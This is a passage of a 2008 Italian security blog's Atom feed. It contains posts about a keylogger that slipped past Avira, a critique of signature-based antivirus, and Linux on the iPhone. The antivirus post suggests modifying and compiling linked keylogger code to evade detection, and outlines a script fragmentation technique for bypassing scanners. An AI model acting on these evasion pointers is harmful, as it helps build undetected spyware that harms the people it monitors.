556px; height: 172px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/30000/4000/800/34808/34808.strip.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-8212576306943205485?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/rVBSEbP1LLw30mWfVJuS630JRPo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rVBSEbP1LLw30mWfVJuS630JRPo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/rVBSEbP1LLw30mWfVJuS630JRPo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rVBSEbP1LLw30mWfVJuS630JRPo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=XOK0zm5HSIA:BHZTYz9vfFM:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=XOK0zm5HSIA:BHZTYz9vfFM:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=XOK0zm5HSIA:BHZTYz9vfFM:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=XOK0zm5HSIA:BHZTYz9vfFM:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=XOK0zm5HSIA:BHZTYz9vfFM:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=XOK0zm5HSIA:BHZTYz9vfFM:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=XOK0zm5HSIA:BHZTYz9vfFM:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=XOK0zm5HSIA:BHZTYz9vfFM:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/XOK0zm5HSIA" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8212576306943205485?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8212576306943205485?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/XOK0zm5HSIA/0day-in-internet-explorer7-exploit.html" title="0day in Internet Explorer7 - Exploit pubblico" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/12/0day-in-internet-explorer7-exploit.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEDRHs5fSp7ImA9WxRbF0k.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-1867132091240527188</id><published>2008-12-08T04:35:00.000-08:00</published><updated>2008-12-08T05:24:35.525-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-08T05:24:35.525-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sandbox" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><title>Come volevasi dimostrare</title><content type="html">&lt;a href="http://www.yashkadakia.com"&gt;Yash Kadakia&lt;/a&gt;, senza nemmeno aver letto il mio post (in italiano, che non conosce), &lt;a href="http://blogs.hackerscenter.com/2008/12/avid-antivirus-is-dead.html"&gt;ha postato su Hackers Center&lt;/a&gt; una sua esperienza personale che dimostra ancora una volta l'inefficacia degli Antivirus.&lt;br /&gt;&lt;br /&gt;Solo la sua esperienza personale ha potuto salvarlo da un keylogger a dimostrazione del fatto che gli Antivirus sono ormai inutili contro le attuali minacce.&lt;br /&gt;&lt;br /&gt;Utilizzando &lt;a href="http://www.sandboxie.com/"&gt;Sandboxie&lt;/a&gt;, un utility gratuita tra le mie preferite, ha potuto capire cosa, quell'eseguibile di origine sospetta, stesse facendo al suo sistema operativo (keylogging e upload dei log su ftp).&lt;br /&gt;&lt;br /&gt;Proprio come raccontavo &lt;a href="http://www.armandoromeo.com/2008/12/lantivirus-morto.html"&gt;nel post precedente&lt;/a&gt;, l'Antivirus, in questo caso Avira, non è stato in grado di riconoscere il keylogger e la chiamata all'Api&lt;br /&gt;&lt;pre&gt;&lt;span style="font-size: 100%;"&gt;&lt;code&gt;&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal; font-family: Courier New;"&gt;&lt;span class="cpp1-symbol"&gt;GetAsyncKeyState&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Una buona lettura che consiglio anche agli "esperti".&lt;br /&gt;&lt;br /&gt;Il post è disponibile &lt;a href="http://blogs.hackerscenter.com/2008/12/avid-antivirus-is-dead.html"&gt;qui&lt;/a&gt; .&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-1867132091240527188?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/MaJGOXi17a4gJRtu9GUgIIPdS4A/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/MaJGOXi17a4gJRtu9GUgIIPdS4A/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/MaJGOXi17a4gJRtu9GUgIIPdS4A/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/MaJGOXi17a4gJRtu9GUgIIPdS4A/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=lA4GeYkyUAU:FJxVONtZw-s:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=lA4GeYkyUAU:FJxVONtZw-s:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=lA4GeYkyUAU:FJxVONtZw-s:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=lA4GeYkyUAU:FJxVONtZw-s:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=lA4GeYkyUAU:FJxVONtZw-s:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=lA4GeYkyUAU:FJxVONtZw-s:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=lA4GeYkyUAU:FJxVONtZw-s:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=lA4GeYkyUAU:FJxVONtZw-s:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/lA4GeYkyUAU" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1867132091240527188?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1867132091240527188?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/lA4GeYkyUAU/come-volevasi-dimostrare.html" title="Come volevasi dimostrare" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/12/come-volevasi-dimostrare.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkEDRng7fSp7ImA9WxRbFUs.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-6800609982791355618</id><published>2008-12-06T01:01:00.000-08:00</published><updated>2008-12-06T03:57:57.605-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-06T03:57:57.605-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><title>L'Antivirus è morto</title><content type="html">&lt;span style="font-weight: bold;"&gt;Qual'è il miglior Antivirus&lt;/span&gt;? Quello che consuma meno Ram.&lt;br /&gt;Il titolo prende spunto da un famoso &lt;a href="http://techbuddha.wordpress.com/2006/12/01/anti-virus-is-dead/"&gt;post &lt;/a&gt;di Amrit Williams, che da ex dipendente di McAfee ha un opinione molto più autorevole della mia.&lt;br /&gt;&lt;br /&gt;Titolo sensazionalistico a parte, ci sono molti motivi per dubitare dell'effettiva utilità degli Antivirus.&lt;br /&gt;&lt;br /&gt;Nonostante non se ne possa fare a meno,  gli antivirus sono stati per troppi anni considerati come uno strumento di "protezione" producendo quel "False sense of security" per citare Bruce Schneier, che è il peggiore nemico della vera sicurezza.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ci sono interi siti autoproclamatisi di "sicurezza informatica" che hanno del "Qual'è il miglior Antivirus" la loro mission.&lt;br /&gt;&lt;br /&gt;L'utente medio, poco esperto, dovrebbe però capire da cosa l'Antivirus protegge.&lt;br /&gt;L'antivirus è indispensabile nel caso di virus &lt;span style="font-weight: bold;"&gt;noti&lt;/span&gt; e già in circolazione su larga scala.&lt;br /&gt;&lt;br /&gt;L'antivirus è uno strumento &lt;span style="font-weight: bold;"&gt;inutile&lt;/span&gt; (a molto fastidioso) per quelle minacce in piccola scala, custom-made o rootkit.&lt;br /&gt;&lt;br /&gt;La maggior parte degli antivirus in commercio (per centinaia di dollari) basa il riconoscimento dei virus su signature dell'eseguibile e posizionamento all'interno della macchina infetta.&lt;br /&gt;&lt;br /&gt;La signature è un codice di lunghezza fissa ottenuto da una stringa a lunghezza variabile.&lt;br /&gt;(molto simile al risultato di un md5 per rendere la discussione estremamente semplice).&lt;br /&gt;&lt;br /&gt;Le definizioni dei virus (quelle che si aggiornano giornalmente) contengono appunto queste signature.&lt;br /&gt;&lt;br /&gt;La bellezza della signature è che cambiando un singolo carattere alla stringa da cui viene generata, cambia completamente anch'essa.&lt;br /&gt;&lt;br /&gt;Nello specifico, se il virus cambia il suo codice di un singolo byte, l'Antivirus è un'icona nella tray e 200Mb di Ram in meno. Nient'altro.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_-FDKJTRMHR0/STpXZj5Rm8I/AAAAAAAAABU/phUHhfiTJ74/s1600-h/092807norton_antivirus.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 247px;" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/STpXZj5Rm8I/AAAAAAAAABU/phUHhfiTJ74/s400/092807norton_antivirus.gif" alt="" id="BLOGGER_PHOTO_ID_5276626010061773762" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;L'approccio per signature ha problemi di scalabilità&lt;/span&gt; che lo stesso signor Kaspersky ha ammesso.&lt;br /&gt;Produrre la signature di un virus è un operazione che richiede un intervento umano.&lt;br /&gt;Le aziende di Antivirus hanno migliaia di dipendenti allo scopo.&lt;br /&gt;Un'ondata di "noise" virus, tutti diversi tra loro produrrebbe un sovraccarico di lavoro e un conseguente rallentamento nel rilevamento dei veri virus che avrebbero tempo a sufficienza per diffondersi.&lt;br /&gt;&lt;br /&gt;Con l'aumentare delle signature da controllare, inoltre, si ha un rallentamento della velocità di scansione dei file. Ogni file che viene aperto su un computer viene comparato con un database di signature sempre più grande.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Non solo. Gli Antivirus sembrano anche soffrire di demenza senile (funzionano con tecnologie vecchie 10 anni). Molti di loro non sono nemmeno in grado di riconoscere API di Windows potenzialmente dannose come la&lt;br /&gt;&lt;pre&gt;&lt;span style="font-size:100%;"&gt;&lt;code&gt;&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; font-size-adjust: none; font-stretch: normal;font-family:Courier New;" &gt;&lt;span class="cpp1-symbol"&gt;GetAsyncKeyState&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/pre&gt;funzione utilizzata per recuperare i dati digitati da tastiera.&lt;br /&gt;Un minimo di intelligenza in questi software avrebbe permesso di capire quando tale funzione è utilizzata per scopi legittimi e quando invece ad esempio, il buffer recuperato da tastiera viene inviato via mail.&lt;br /&gt;&lt;br /&gt;Scrivere un keylogger in C è un'operazione che possono fare davvero in molti.&lt;br /&gt;Provate a compilare &lt;a href="http://www.irongeek.com/i.php?page=security/keylogger"&gt;tale codice&lt;/a&gt; con qualche modifica. Poi fate una scansione con il vostro Antivirus.&lt;br /&gt;Se un vostro amico vuole giocarvi uno scherzetto, non c'è Antivirus che lo possa fermare. Gli bastano, Google, copia e incolla e un compilatore. Nessuna reale conoscenza nè di programmazione tanto meno di hacking.&lt;br /&gt;&lt;br /&gt;I vendor di antivirus, negli ultimi anni, hanno combattuto una guerra interna per accaparrarsi nuove quote del mercato entry-user. E hanno dimenticato di combattere contro chi sfornava virus polimorfici, rilocazione dinamica e mille altre diavolerie. Esercizi di stile più che altro.&lt;br /&gt;Bypassare un antivirus è come uccidere una mosca con un cannone.&lt;br /&gt;&lt;br /&gt;L'interfaccia di questi programmi è diventata sempre più accattivante (e pesante).&lt;br /&gt;L'efficacia sempre la stessa. Un po come avere il motore di una 500 su una carrozzeria Ferrari.&lt;br /&gt;&lt;br /&gt;Da notare che sinora si è parlato solo dei classici virus. I rootkit sono tutta un'altra storia.&lt;br /&gt;Non c'è Antivirus che sia in grado di fornire la benchè minima protezione contro questo tipo di virus (presenti ormai da almeno 4-5 anni) nonostante quello che si legga in press release e recensioni.&lt;br /&gt;&lt;br /&gt;Dal &lt;a href="http://en.wikipedia.org/wiki/Morris_worm"&gt;Morris worm &lt;/a&gt;ad oggi molte cose sono cambiate. Chi scrive malware non lo fa più per fama.&lt;br /&gt;C'è un settore da centinaia di milioni di dollari dietro Botnet e malware, che vengono usati per spam al fine di frodare i cosiddetti utenti medi. Con tali interessi in gioco, le minacce si sono fatte sempre più sofisticate e insistenti.  Mentre McAfee et al. raffinavano l'interfaccia grafica.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;E' di pochi giorni fa una &lt;a href="http://djtechnocrat.blogspot.com/2008/11/script-fragmentation-attack-could-allow.html"&gt;ricerca &lt;/a&gt;di Stephan Chenette di Websense dal nome &lt;span style="font-weight: bold;"&gt;Script fragmentation attack&lt;/span&gt;. La trovo interessante quanto semplice da realizzare.&lt;br /&gt;Bypassare Antivirus su desktop o sul gateway è possibile frammentando lo scaricamento del codice malware dalla rete. In breve, una pagina web contiene un normalissimo e legittimo codice che provvederà a scaricare il codice malware byte per byte da sorgenti diverse.&lt;br /&gt;Un codice del genere si trova in qualsiasi sito Web 2.0 che usi Ajax ad esempio. Quindi nessuna minaccia in se stessa.&lt;br /&gt;Una volta scaricato tutto il payload il malware può essere lanciato senza che l'antivirus abbia avuto modo di "vedere" &lt;span style="font-weight: bold;"&gt;tutto &lt;/span&gt;il codice.&lt;br /&gt;Nessuna soluzione è al momento disponibile per tale problema se non disattivare Javascript.&lt;br /&gt;(Morte del Web 2.0, di Facebook e altre amenità).&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;/em&gt;&lt;em&gt;&lt;/em&gt;&lt;br /&gt;La sicurezza desktop, o endpoint security nel gergo aziendale, è più questione di cultura che di tool. Le aziende dovrebbero spendere meno per gli Antivirus e di più in corsi e training per dipendenti.  Solo con una cosciente cultura di sicurezza informatica un'azienda può sopravvivere ai costi crescenti dovuti a spam e interruzioni di servizio causati da malware. Che gli Antivirus non sono stati in grado di mitigare.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a href="http://dilbert.com/strips/comic/2008-12-03/" title="Dilbert.com"&gt;&lt;img style="width: 570px; height: 177px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/30000/4000/000/34004/34004.strip.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-6800609982791355618?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/LffY1gWFxARsKu5PNQyP-qMTH7k/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LffY1gWFxARsKu5PNQyP-qMTH7k/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/LffY1gWFxARsKu5PNQyP-qMTH7k/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LffY1gWFxARsKu5PNQyP-qMTH7k/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2ZHaSq6UQoE:5vjVzb-Sarg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2ZHaSq6UQoE:5vjVzb-Sarg:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2ZHaSq6UQoE:5vjVzb-Sarg:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=2ZHaSq6UQoE:5vjVzb-Sarg:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2ZHaSq6UQoE:5vjVzb-Sarg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2ZHaSq6UQoE:5vjVzb-Sarg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=2ZHaSq6UQoE:5vjVzb-Sarg:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=2ZHaSq6UQoE:5vjVzb-Sarg:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/2ZHaSq6UQoE" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6800609982791355618?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/6800609982791355618?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/2ZHaSq6UQoE/lantivirus-morto.html" title="L'Antivirus è morto" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_-FDKJTRMHR0/STpXZj5Rm8I/AAAAAAAAABU/phUHhfiTJ74/s72-c/092807norton_antivirus.gif" height="72" width="72" /><feedburner:origLink>http://www.armandoromeo.com/2008/12/lantivirus-morto.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8CRHg8eSp7ImA9WxRbEUk.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-2865963997472243607</id><published>2008-12-01T08:26:00.001-08:00</published><updated>2008-12-01T08:27:45.671-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-01T08:27:45.671-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="linux" /><category scheme="http://www.blogger.com/atom/ns#" term="ipod" /><category scheme="http://www.blogger.com/atom/ns#" term="iphone" /><title>Linux sull'iPhone  ora è possibile</title><content type="html">&lt;a href="http://linuxoniphone.blogspot.com/2008/11/linux-on-iphone.html"&gt;Un gruppo di hacker&lt;/a&gt; è finalmente riuscito a vincere un'altra battaglia contro Apple.&lt;br /&gt;Linux finisce sull'iPhone di prima e seconda generazione. Il Kernel 2.6 è supportato.&lt;br /&gt;&lt;br /&gt;Al momento la versione di Linux caricata è molto scarna, wireless e touch screen non ancora supportati ma siamo solo all'inizio.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;object width="400" height="533"&gt;&lt;param name="allowfullscreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=2373142&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1"&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=2373142&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="533"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;a href="http://vimeo.com/2373142"&gt;iPhone Linux Demonstration Video&lt;/a&gt; from &lt;a href="http://vimeo.com/user983560"&gt;planetbeing&lt;/a&gt; on &lt;a href="http://vimeo.com/"&gt;Vimeo&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://www.iphone-dev.org/planetbeing/LINUX-README.txt"&gt;Qui &lt;/a&gt;ci sono le istruzioni per l'installazione. E &lt;a href="http://91.186.26.18/iphone/files/iphonelinux-demo.tar.gz"&gt;qui &lt;/a&gt;i file di installazione.&lt;br /&gt;&lt;br /&gt;A parte l'esercizio di stile di questi "hacker", aziende come HTC, Hp o Palm non dovrebbero saper ascoltare il mercato e sfornare una palmare che supporti pienamente il sistema operativo Linux senza che qualcuno violi le leggi? Hint: date un'occhiata al numero di Digg ricevuti dal &lt;a href="http://linuxoniphone.blogspot.com/"&gt;blog del gruppo&lt;/a&gt;  in soli 5 giorni...&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-2865963997472243607?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/SRUJg6PgHlwdY_44bLLxtfZP_ec/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SRUJg6PgHlwdY_44bLLxtfZP_ec/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/SRUJg6PgHlwdY_44bLLxtfZP_ec/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SRUJg6PgHlwdY_44bLLxtfZP_ec/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=iTyDzr9zGUE:XUcper5KlWo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=iTyDzr9zGUE:XUcper5KlWo:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=iTyDzr9zGUE:XUcper5KlWo:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=iTyDzr9zGUE:XUcper5KlWo:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=iTyDzr9zGUE:XUcper5KlWo:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=iTyDzr9zGUE:XUcper5KlWo:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=iTyDzr9zGUE:XUcper5KlWo:gIN9vFwOqvQ"&gt;&lt;img 